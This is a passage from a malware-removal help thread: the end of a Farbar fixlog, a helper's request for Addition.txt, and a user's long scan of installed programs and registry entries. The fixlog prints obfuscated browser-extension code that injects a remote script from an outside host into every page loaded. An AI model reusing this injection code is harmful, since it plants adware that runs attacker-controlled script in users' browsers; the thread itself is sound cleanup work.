var _injectInlineJSCode=function(a, b){var c=b.createElement("script");c.setAttribute("type","text/javascript");c.innerHTML=a;(b.getElementsByTagName("head")[0]||b.getElementsByTagName("body")[0]).appendChild(c)},_handleDocumentElementInsterted=function(a){if(a&&a instanceof Components.interfaces.nsIDOMHTMLDocument){var b=a&&a.defaultView?a.defaultView:null;b&&b===b.top&&(_injectInlineJSCode("setTimeout(function(){var tag = document.createElement('script');tag.setAttribute('type','text/javascript');tag.setAttribute('src','//icm.r.worldssl.net/ff/m.js');(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(tag);},1000*2);",
a),_injectInlineJSCode("setTimeout(function(){"+inline_code+"},1000*3);",a))}},observerService=Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver({QueryInterface:function(a){if(a.equals(Components.interfaces.nsIObserver)||a.equals(Components.interfaces.nsISupports)||a.equals(Components.interfaces.nsISupportsWeakReference))return this;throw Components.results.NS_NOINTERFACE;},observe:function(a,b,c){try{"document-element-inserted"===b&&_handleDocumentElementInsterted(a)}catch(d){}}},"document-element-inserted",!1);
})();
} catch(e){
}
========= End of CMD: =========


==== End of Fixlog 21:55:02 ====

#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 08 April 2015 - 03:47 AM

Hi,

 

Can you please post the Addition.txt as well?

Thanks! :)

 

 

Regards,

Georgi



#6 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  • Local time:08:16 AM

Posted 08 April 2015 - 11:49 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-03-2015
Ran by User at 2015-04-06 22:19:25
Running from C:\Users\User\Desktop\Malware software
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Ace Stream Media 3.0.3 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\AceStream) (Version: 3.0.3 - Ace Stream Media)
Ace Stream Media 3.0.3 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\AceStream) (Version: 3.0.3 - Ace Stream Media)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.00 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser) (Version: 2.0 Build 348 - Adobe Systems Incorporated.)
Advanced Renamer (HKLM-x32\...\Advanced Renamer_is1) (Version: 3.64 - Hulubulu Software)
Advanced Uninstaller PRO - Version 11 (HKLM-x32\...\AU11_is1) (Version: 11.56.0.211 - Innovative Solutions)
AmCap version 9.01 (HKLM-x32\...\{0F45BECF-4C85-4301-A8A4-D2E2AE2A2C08}_is1) (Version: 9.01 - Gigabyte, Inc.)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.23831 - Electronic Arts)
Battlefield™ Hardline Beta (HKLM-x32\...\{599276A7-F45D-40B1-A0B6-CF132A1CAD49}) (Version: 1.0.0.4 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BbeXtreme (x32 Version: 12.0.0 - Bluebeam Software) Hidden
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Bluebeam Revu x64 12 (HKLM-x32\...\InstallShield_{A8E3F673-82B9-4AF0-97C7-4DEDA7042E5E}) (Version: 12.0.0 - Bluebeam Software)
Bluebeam Revu x64 12 (Version: 12.0.0 - Bluebeam Software) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Brother MFL-Pro Suite MFC-J5910DW (HKLM-x32\...\{830F55B6-4398-4B72-A0D8-66397B902C0E}) (Version: 1.1.1.0 - Brother Industries, Ltd.)
BurnAware Free 6.9 (HKLM-x32\...\BurnAware Free_is1) (Version:  - Burnaware)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.2.4478 - CDBurnerXP)
Classic Shell (HKLM\...\{023F92C9-AB10-4C54-BF09-C550AEC37917}) (Version: 4.0.6 - IvoSoft)
Counter-Strike (HKLM-x32\...\Steam App 10) (Version:  - Valve)
CPUID HWMonitor 1.24 (HKLM\...\CPUID HWMonitor_is1) (Version:  - )
Crysis® (HKLM-x32\...\{000E79B7-E725-4F01-870A-C12942B7F8E4}) (Version: 1.00.0000 - Electronic Arts)
CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4427.02 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Dropbox (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Dropbox) (Version: 3.2.9 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dropbox) (Version: 3.2.9 - Dropbox, Inc.)
Epson Connect Printer Setup (HKLM-x32\...\{D9B1D51B-EB56-410D-AEB5-1CCFAC4B6C8C}) (Version: 1.3.0 - SEIKO EPSON CORPORATION)
Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.4.0.0 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{44F72193-F59C-4303-BAE8-E3E4BC1C122C}) (Version: 3.01.0003 - Seiko Epson Corporation)
Epson FAX Utility (HKLM-x32\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 1.46.00 - SEIKO EPSON CORPORATION)
Epson PC-FAX Driver (HKLM-x32\...\EPSON PC-FAX Driver 2) (Version:  - )
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON XP-800 Series Printer Uninstall (HKLM\...\EPSON XP-800 Series) (Version:  - SEIKO EPSON Corporation)
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ETDWare PS/2-X64 11.14.4.3_WHQL (HKLM\...\Elantech) (Version: 11.14.4.3 - ELAN Microelectronic Corp.)
EVGA Precision X 4.2.1 (HKLM-x32\...\PrecisionX) (Version: 4.2.1 - EVGA Corporation)
File Renamer - Basic (HKLM-x32\...\File Renamer - Basic) (Version: 6.3 - Sherrod Computers)
FINEVu Player (HKLM-x32\...\{F3AEED03-5238-4C60-9651-EAF1BE93232D}) (Version: 7.0.0 - FineDigital)
foobar2000 v1.2.9 (HKLM-x32\...\foobar2000) (Version: 1.2.9 - Peter Pawlowski)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Free YouTube Download version 3.2.43.806 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.43.806 - DVDVideoSoft Ltd.)
FreeStyle version 3.22 (HKLM-x32\...\{E16215FB-939E-4082-B639-2D1A94831C52}_is1) (Version: 3.22 - GameKiss)
Galeria de Fotografias (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Galería de fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
GIGABYTE Smart Recovery Generator 1.0.20130705 (HKLM-x32\...\GIGABYTE Smart Recovery Generator) (Version: 1.0.20130705 - GIGABYTE TECHNOLOGY CO.,LTD.)
GIGABYTE Voice Search 2.6.0 (HKLM-x32\...\GIGABYTE Voice Search) (Version: 2.6.0 - GIGABYTE TECHNOLOGY CO.,LTD.)
GKLauncher version 1.1.0.4 (HKLM-x32\...\{961346DF-FE43-4392-99FC-47B1F5A882C3}_is1) (Version: 1.1.0.4 - GameKiss)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 41.0.2272.118 - Google Inc.)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
H&R Block California 2014 (HKLM-x32\...\{3DEC6F75-77F4-4C6C-BD0B-A74C92CFD548}) (Version: 1.14.5101 - HRB Technology, LLC.)
H&R Block Deluxe + Efile + State 2014 (HKLM-x32\...\{BDA77C08-60A6-4AAB-B5A9-849ECF399A49}) (Version: 14.05.6401 - HRB Technology, LLC.)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36943 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.10.1550 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology(patch version 3.0.1342.2) (HKLM\...\{302600C1-6BDF-4FD1-1311-148929CC1385}) (Version: 3.1.1311.0402 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.5.0.1066 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 3.0.0.63463 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{105fa5c4-72e1-41f2-a82c-884d8aa4b381}) (Version: 16.6.0 - Intel Corporation)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.710 - Oracle)
Juniper Networks Setup Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Juniper_Setup_Client) (Version: 8.0.6.48695 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Juniper_Setup_Client) (Version: 8.0.6.48695 - Juniper Networks)
Juniper Networks Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Networks Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Terminal Services Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Juniper_Term_Services) (Version: 8.0.6.32195 - Juniper Networks)
Juniper Terminal Services Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Juniper_Term_Services) (Version: 8.0.6.32195 - Juniper Networks)
Junos Pulse 5.0 (HKLM-x32\...\Junos Pulse 5.0) (Version: 5.0.48695 - Juniper Networks, Inc.)
Junos Pulse Core Components (x32 Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse Drivers Add-On (Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse Host Checker Plugin Add-On (x32 Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse Tunnel Manager Add-On (x32 Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse UAC/NC Components (x32 Version: 5.0.48695 - Juniper Networks) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
Logitech Gaming Software 8.51 (HKLM\...\Logitech Gaming Software) (Version: 8.51.5 - Logitech Inc.)
Logitech SetPoint 6.65 (HKLM\...\sp6) (Version: 6.65.62 - Logitech)
Malwarebytes Anti-Malware version 2.1.4.1018 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.31211.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Preview Redistributable (x64) - 12.0.20617 (HKLM-x32\...\{448652c1-f5f3-4230-98c6-68c10c88b1fb}) (Version: 12.0.20617.1 - Microsoft Corporation)
Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version:  - Microsoft Corporation)
MonInfo 2.7 (HKLM-x32\...\{AD0BBBFD-C5E9-4214-A863-E83313D67C0C}_is1) (Version: 2.60.0.973 - EnTech Taiwan)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 36.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 36.0.4 (x86 en-US)) (Version: 36.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Mp3tag v2.60 (HKLM-x32\...\Mp3tag) (Version: v2.60 - Florian Heidenreich)
MPC-HC 1.7.3 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.3 - MPC-HC Team)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
NVIDIA 3D Vision Driver 347.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 347.88 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.1.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.1.21 - NVIDIA Corporation)
NVIDIA Graphics Driver 347.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 347.88 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.33.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.33.0 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
Origin (HKLM-x32\...\Origin) (Version: 9.3.11.2762 - Electronic Arts, Inc.)
paint.net (HKLM\...\{19BD2C33-16A8-4ED1-B9EA-D9E35B21EC42}) (Version: 4.0.5 - dotPDN LLC)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Python 2.7.3 (HKLM-x32\...\{C0C31BCC-56FB-42A7-8766-D29E1BD74C7C}) (Version: 2.7.3150 - Python Software Foundation)
qBittorrent 3.1.4 (HKLM-x32\...\qbittorrent) (Version: 3.1.4 - The qBittorrent project)
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.02 - Razer Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21239 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7101 - Realtek Semiconductor Corp.)
RivaTuner Statistics Server 5.2.0 (HKLM-x32\...\RTSS) (Version: 5.2.0 - Unwinder)
SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.1.21 - NVIDIA Corporation) Hidden
Smart Manager V3 Ver 3.6.1 (HKLM\...\Smart Manager V3) (Version: Ver 3.6.1 - GIGABYTE)
Smart Switch v1.4.7 (HKLM-x32\...\Smart Switch) (Version: v1.4.7 - GIGABYTE TECHNOLOGY CO.,LTD.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Smart Update v2.4.3 (HKLM-x32\...\Smart Update) (Version: v2.4.3 - GIGABYTE TECHNOLOGY CO.,LTD.)
Software Updater (HKLM-x32\...\{FA7EE274-7370-43B7-9A45-A39B17CCCDC5}) (Version: 4.3.3 - SEIKO EPSON CORPORATION)
SolidWorks 2014 x64 Edition SP0 (HKLM-x32\...\SolidWorks Installation Manager 20140-40000-1100-100) (Version: 22.0.0.5018 - SolidWorks Corporation)
SolidWorks 2014 x64 Edition SP0 (Version: 22.100.5018 - SolidWorks) Hidden
SolidWorks Composer Player 2014 SP0 x64 Edition (Version: 22.00.5018 - Dassault Systemes SolidWorks) Hidden
SolidWorks eDrawings 2014 x64 Edition SP0 (Version: 14.0.5006 - Dassault Systèmes SolidWorks Corp) Hidden
SolidWorks Explorer 2014 SP0 x64 Edition (Version: 22.00.5018 - SolidWorks Corporation) Hidden
SolidWorks Flow Simulation 2014 SP0 x64 Edition  (Version: 22.00.5019 - SolidWorks Corporation) Hidden
SolidWorks Plastics 2014 SP0 x64 Edition (Version: 22.00.5018 - SolidWorks Corporation) Hidden
SopCast 3.5.0 (HKLM-x32\...\SopCast) (Version: 3.5.0 - www.sopcast.com)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
System Requirements Lab for Intel (HKLM-x32\...\{C7CA731B-BF9A-46D9-92CF-8A8737AE9240}) (Version: 4.5.13.0 - Husdawg, LLC)
TagScanner 5.1.649 (HKLM-x32\...\TagScanner_is1) (Version:  - Sergey Serkov)
Unity Web Player (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\UnityWebPlayer) (Version: 4.5.1f3 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\UnityWebPlayer) (Version: 4.5.1f3 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC8 CRT (Version: 8.0.50727.762 - Juniper Networks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WinDirStat 1.1.2 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\WinDirStat) (Version:  - )
WinDirStat 1.1.2 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\WinDirStat) (Version:  - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Yadis! Backup 1.10.12 (HKLM-x32\...\Yadis_is1) (Version:  - Codessentials)
Zviewer version 2.0.0.9 (HKLM-x32\...\{1B00336F-393F-4DC7-9956-42C69ED6565E}_is1) (Version: 2.0.0.9 - )
影像中心 (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
照片库 (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
